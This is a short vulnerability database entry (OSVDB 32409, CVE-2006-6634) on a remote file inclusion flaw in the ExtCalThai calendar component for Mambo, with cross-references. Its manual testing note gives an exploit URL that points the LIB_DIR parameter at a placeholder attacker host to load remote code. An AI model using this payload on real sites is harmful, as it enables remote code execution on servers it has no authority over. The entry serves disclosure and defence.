ExtCalThai for Mambo mail.inc.php CONFIG_EXT[LIB_DIR] Variable Remote File Inclusion

2006-10-12T21:54:43
ID OSVDB:32409
Type osvdb
Reporter OSVDB
Modified 2006-10-12T21:54:43

Description

Manual Testing Notes

http://[target]/MamboV4.6RC2/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://[attacker]/cmd.gif?

References:

Related OSVDB ID: 32407 Related OSVDB ID: 32408 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0179.html ISS X-Force ID: 29499 CVE-2006-6634 Bugtraq ID: 20487